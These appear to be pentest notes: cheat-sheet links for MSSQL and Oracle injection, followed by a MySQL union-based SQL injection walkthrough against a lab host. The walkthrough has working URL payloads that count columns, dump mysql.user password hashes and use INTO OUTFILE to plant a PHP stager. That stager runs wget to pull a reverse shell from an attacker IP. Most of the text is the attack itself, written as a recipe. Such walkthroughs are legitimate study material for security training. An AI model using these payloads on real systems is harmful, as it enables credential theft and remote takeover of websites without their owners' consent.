XSS | SQLi
MSSQL:-
https://hydrasky.com/network-security/mssql-server-injection-tutorial/
https://gracefulsecurity.com/sql-injection-exploitation/
https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/
ORACLE UNION:-
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html
MYSQL:-
On visiting the URL in the browser we find a hotel booking page. One parameter is vulnerable to SQLi:
http://10.10.10.143/room.php?cod=1
Add a \ after the parameter value to check for SQLi:
http://10.10.10.143/room.php?cod=1\
The room details disappear from the page. A trailing backslash is invalid in a numeric context and escapes the closing quote in a string one, so either way the query errors and the application hides the output. Content that vanishes on a single stray character is the usual sign of SQLi.
Before counting columns, fix the query by commenting out whatever follows the injection point (in a URL, + decodes to the space MySQL needs after --):
http://10.10.10.143/room.php?cod=1 --+
Now find the total number of columns in the original SELECT:
http://10.10.10.143/room.php?cod=1 order by 1 --+
Increase the column number until the content disappears again (ORDER BY on a column that does not exist is an error). The last number that still renders is the column count. Here it is 7.
Next find which columns are reflected in the page:
http://10.10.10.143/room.php?cod=1 union select 1,2,3,4,5,6,7 --+
Nothing changes, because the page only renders the first row and that row still comes from the original query (cod=1). Use an id that matches no room, so the UNION row is the only one returned:
http://10.10.10.143/room.php?cod=-1 union select 1,2,3,4,5,6,7 --+
The numbers that show up on the page are the columns we can read data through. Column 2 is rendered where the room name goes, so it is a string field; use it to pull data, e.g. the MySQL accounts and password hashes from mysql.user (this needs read access to the mysql database):
http://10.10.10.143/room.php?cod=-1%20union%20select%20all%201,(SELECT%20group_concat(host,user,password)%20FROM%20mysql.user),3,4,5,6,7--+
If the database account has the FILE privilege (and secure_file_priv is empty or points at a usable directory), the same reflected column can write a file into the web root. INTO OUTFILE has to be the last clause of the SELECT and will not overwrite an existing file; the file is created by the mysql OS user, so that user needs write access to the directory. Here it drops a small PHP stager that downloads a php-reverse-shell from our host:
http://10.10.10.143/room.php?cod=-1 union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.4/pentest.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'
Requesting test4.php runs the stager; shell.php is then the reverse shell and needs a listener waiting on 10.10.14.4.